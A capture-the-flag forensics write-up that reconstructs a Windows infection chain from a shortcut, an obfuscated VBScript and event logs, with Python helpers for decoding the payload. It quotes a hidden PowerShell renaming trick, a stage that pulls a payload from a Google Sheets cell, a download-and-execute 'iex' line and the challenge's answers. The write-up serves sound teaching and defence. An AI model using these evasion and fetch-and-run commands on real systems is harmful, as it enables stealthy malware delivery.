Hack the Box Business CTF 2023 - Write Up 'Scripts and Formulas'

This is a write-up for the challenge "Scripts and Formulas" from the Hack The Box (HTB) Business CTF 2023. The task was classified as a forensics challenge.

Challenge

The challenge description stated that a computer had been compromised and that, given some Windows event logs and a VBScript file, one should reconstruct what exactly happened.

Given Files

  • invoice.vbs
  • 355 Windows .evtx event log files
  • A Windows shortcut file

Solution

The shortcut file contains the command below, which already answers the first question. It copies the legitimate script host cscript.exe to calc.exe and then uses that copy to run Invoice.vbs, so the script host shows up under a harmless-looking process name (a simple renaming trick; the copy is still a fully functional cscript.exe). The PowerShell switches -Nop -sta -noni -w hidden (no profile, single-threaded apartment, non-interactive, hidden window) keep the whole thing quiet.

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Nop -sta -noni -w hidden -c cp C:\Windows\System32\cscript.exe .\calc.exe;.\calc.exe Invoice.vbs

For the next question, one has to look into the script. A stripped version is shown here; the long string literals are cut off.

Function ZbVxxAHCsiTnKpIJ()
    Dim yNSlalZeGAsokjsP                 ' decoded program path
    Dim cMtARTHTmbqbxauA                 ' full command line to run
    Dim objShell
    Set objShell = WScript.CreateObject("WScript.Shell")
    yNSlalZeGAsokjsP = LLdunAaXwVgKfowf("BcV:L\XwFiInDdDoXw7s1...
    cMtARTHTmbqbxauA = yNSlalZeGAsokjsP & " " & LLdunAaXwVgKfo...
    objShell.Run cMtARTHTmbqbxauA        ' line 8: launches the next stage
End Function
' De-obfuscator: splits the literal into single characters and keeps only
' those that pass the test in the loop below. Since VBScript compares
' strings byte-wise by default, "x = LCase(x)" is only true for characters
' without an upper-case form, so the upper-case letters are junk. The rest
' of the condition ("And Not ...") is cut off here.
Function LLdunAaXwVgKfowf(t)
    Dim msStr()
    ReDim msStr(Len(t))                  ' indices 0..Len(t); element 0 stays ""
    Dim jKaNZCemSwPDrmLT
    jKaNZCemSwPDrmLT = ""
    For i = 1 To UBound(msStr)
        msStr(i) = Mid(t, i, 1)          ' one character per array slot
    Next
    For Each qqEPRvFjIuMSmDvM In msStr
        If qqEPRvFjIuMSmDvM = LCase(qqEPRvFjIuMSmDvM) And Not ...
    Next
    LLdunAaXwVgKfowf = jKaNZCemSwPDrmLT  ' the surviving characters, concatenated
End Function
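As an added example (my code, not the challenge files or the author's), here is a Python re-implementation of the de-obfuscator above, so the string literals can be decoded statically instead of running the sample in Excel. The visible part of the VBScript condition keeps a character only when it equals its own LCase(), which with VBScript's default binary comparison holds for lower-case letters, digits and punctuation and fails for upper-case letters. The remainder of the condition is cut off on the page; the additional digit-dropping filter is my assumption, chosen because a stray "7" sits inside "windows" in the visible prefix of the first literal. Under that assumption the prefix decodes to c:\windows. The obfuscator and the decode_literals helper are mine, added for round-trip testing.

```python
import re

# Added example (mine, not code from the challenge or the write-up): a Python
# re-implementation of LLdunAaXwVgKfowf from invoice.vbs.
#
# Visible VBScript test: `ch = LCase(ch)` (binary comparison) keeps characters
# that have no upper-case form. The rest of the condition ("And Not ...") is cut
# off on the page; dropping digits as well is an ASSUMPTION that turns the
# visible prefix of the first literal into "c:\windows".

# Visible prefix of the first obfuscated literal, copied from the script.
SAMPLE_PREFIX = r"BcV:L\XwFiInDdDoXw7s1"

# Any LLdunAaXwVgKfowf("...") call, to pull literals out of a complete script.
CALL_RE = re.compile(r'LLdunAaXwVgKfowf\("([^"]*)"\)')


def vbs_deobfuscate(encoded: str, drop_digits: bool = True) -> str:
    """Keep every character that LCase() leaves unchanged; upper-case letters
    are junk. With drop_digits (assumed), digits are treated as junk too."""
    kept = []
    for ch in encoded:
        if ch != ch.lower():               # upper-case letter: junk
            continue
        if drop_digits and ch.isdigit():   # assumed second half of the test
            continue
        kept.append(ch)
    return "".join(kept)


def vbs_obfuscate(plain: str, junk: str = "BVLXFIDQ") -> str:
    """Inverse, for round-trip testing: interleave upper-case junk letters with
    the real characters, plus a junk digit every fourth position. The plaintext
    must contain no upper-case letters or digits, or the decoder would drop them."""
    if any(c.isupper() or c.isdigit() for c in plain):
        raise ValueError("plaintext must contain no upper-case letters or digits")
    out = []
    for i, ch in enumerate(plain):
        out.append(junk[i % len(junk)])    # junk letter before each real char
        out.append(ch)
        if i % 4 == 3:
            out.append(str(i % 10))        # junk digit, removed by drop_digits
    return "".join(out)


def decode_literals(script: str) -> list:
    """Decode the argument of every de-obfuscator call found in a script."""
    return [vbs_deobfuscate(m.group(1)) for m in CALL_RE.finditer(script)]


if __name__ == "__main__":
    print(vbs_deobfuscate(SAMPLE_PREFIX))
    demo = 'x = LLdunAaXwVgKfowf("%s")' % vbs_obfuscate("powershell.exe -nop -w hidden")
    print(decode_literals(demo))
```

Running decode_literals over a complete copy of invoice.vbs would recover both literals passed to the decoder in ZbVxxAHCsiTnKpIJ without ever executing the sample; the digit assumption can be checked against the result by toggling drop_digits.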

To understand what this program actually does, I replaced line 8 of the script (the objShell.Run call) with a simple Debug.Print statement, started Excel and ran the function as a macro. With the Run call removed nothing is launched, and the decoded command line is simply printed. This yielded the following (shortened) PowerShell command. It decodes a base64-encoded URL, fetches it with Invoke-RestMethod, takes the content of a single spreadsheet cell from the response, base64-decodes that as well and writes the resulting bytes into a memory stream.

powershell.exe -c "$url =[system.convert]::frombase64string('aHR0cHM6L...');
$resp = invoke-restmethod -uri $url;
$payload = $resp.sheets[0].data[0].rowData[0].values[0].formattedValue;
$decode = [system.convert]::frombase64string($payload);
$ms = new-object system.io.memorystream;
$ms.write($decode,0, $decode.length);

If we decode the URL, we get the ID of the Google Sheet that contains the payload, the API key that is used, and the cell range in which the data is stored.

https://sheets.googleapis.com/v4/spreadsheets/1HpB4GqqYwI6X71z4p2EK88XXX?key=AIzaSyDUpjSf7R1l1dQoXXX&ranges=Sheet1!O37

Finally, we want to know what that payload was. For that, we can look into the Windows logs, specifically Microsoft-Windows-PowerShell%4Operational.evtx. Event ID 4104 (script block logging) records every script block PowerShell executes, including ones assembled at run time, so the next stage appears there as PowerShell actually ran it. Here we can see which command was executed and that the payload was once again obfuscated, this time with an XOR operation.

Log of the Powershell Execution with XOR Obfuscation

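To show the stage-2 pipeline from the decoded URL and the log excerpt end to end, here is an added example (my code, not the challenge's or the author's). It parses the Sheets API URL into spreadsheet ID, API key and cell range, takes the payload out of a Sheets API response the same way the PowerShell does (sheets[0].data[0].rowData[0].values[0].formattedValue), base64-decodes it and brute-forces the single-byte XOR key. The URL is the redacted one from above; the API response, the stage-3 plaintext and the key (35, the challenge's answer) are constructed here so the script runs offline, and the "powershell" crib and the printable-text heuristic are my assumptions about what a plausible stage-3 looks like.

```python
import base64
import json
from urllib.parse import parse_qs, urlparse

# Added example (mine, not code from the challenge or the write-up) of the
# stage-2 pipeline: URL -> API parameters -> cell content -> base64 -> XOR.
# The URL is the redacted one from the write-up; the API response, the
# stage-3 plaintext and the key 35 are CONSTRUCTED so this runs offline.

SAMPLE_URL = ("https://sheets.googleapis.com/v4/spreadsheets/"
              "1HpB4GqqYwI6X71z4p2EK88XXX?key=AIzaSyDUpjSf7R1l1dQoXXX&ranges=Sheet1!O37")
ASSUMED_KEY = 35                      # the XOR key the challenge asks for
ASSUMED_STAGE3 = (b'powershell.exe -nop -w hidden -c '
                  b'"iex (new-object net.webclient).downloadstring($u)"')


def parse_sheets_url(url: str) -> dict:
    """Spreadsheet ID from the path, API key and cell range from the query."""
    u = urlparse(url)
    parts = u.path.strip("/").split("/")          # ['v4', 'spreadsheets', '<id>']
    q = parse_qs(u.query)
    return {
        "spreadsheet_id": parts[parts.index("spreadsheets") + 1],
        "api_key": q.get("key", [None])[0],
        "range": q.get("ranges", [None])[0],
    }


def xor_bytes(data: bytes, key: int) -> bytes:
    """Single-byte XOR, its own inverse."""
    return bytes(b ^ key for b in data)


def build_sample_response(plaintext: bytes, key: int) -> str:
    """Constructed stand-in for the Sheets API JSON: one cell holding
    base64(plaintext XOR key), at the path the stage-2 PowerShell walks."""
    cell = base64.b64encode(xor_bytes(plaintext, key)).decode()
    doc = {"spreadsheetId": "<redacted>",
           "sheets": [{"data": [{"rowData": [{"values": [{"formattedValue": cell}]}]}]}]}
    return json.dumps(doc)


def extract_payload(response_json: str) -> bytes:
    """$resp.sheets[0].data[0].rowData[0].values[0].formattedValue, then the
    same base64 decode as $decode in the PowerShell."""
    doc = json.loads(response_json)
    cell = doc["sheets"][0]["data"][0]["rowData"][0]["values"][0]["formattedValue"]
    return base64.b64decode(cell)


def recover_xor_key(blob: bytes, crib: bytes = b"powershell") -> int:
    """Try all 256 single-byte keys. A key that reveals the crib wins outright;
    otherwise fall back to the key whose output has the most spaces and
    lower-case letters, a cheap heuristic for command lines and scripts."""
    best_key, best_score = 0, -1
    for key in range(256):
        plain = xor_bytes(blob, key)
        if crib and crib in plain:
            return key
        score = sum(1 for b in plain if b == 0x20 or 0x61 <= b <= 0x7A)
        if score > best_score:
            best_key, best_score = key, score
    return best_key


def decode_stage3(response_json: str) -> tuple:
    """Full chain on an API response: (recovered key, decoded stage-3 bytes)."""
    blob = extract_payload(response_json)
    key = recover_xor_key(blob)
    return key, xor_bytes(blob, key)


if __name__ == "__main__":
    print(parse_sheets_url(SAMPLE_URL))
    key, plain = decode_stage3(build_sample_response(ASSUMED_STAGE3, ASSUMED_KEY))
    print(key, plain.decode())
```

In the real case the bytes come from the 4104 event rather than from a live API call; feeding the base64 string seen in the log into extract_payload's decoding step and then recover_xor_key is enough, and the crib can be swapped for whatever the surrounding script block suggests the next stage starts with.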

A lot of the questions could also be answered just by looking at the logs. Here is an example: the log entry for the copy command from the shortcut.

Log of the Initial Copy Command


Now we have all the answers to the questions asked by the nc instance and can get our flag.

Questions and Answers from the netcat Instance

Which file was copied and what was the final file name?

cscript.exe:calc.exe

What is the name of the function that de-obfuscates code in the VBA script?

LLdunAaXwVgKfowf

What is the name of the program used for the next stage?

powershell.exe

What is the id of the spreadsheet that contains the payload?

1HpB4GqqYwI6X71z4p2EK88FoJjrsW2DKbSkx-ro5lQQ

In which cell was the payload hidden?

Sheet1:O37

Which event ID records the PowerShell execution?

4104

Final payload: which key was used for the XOR operation?

35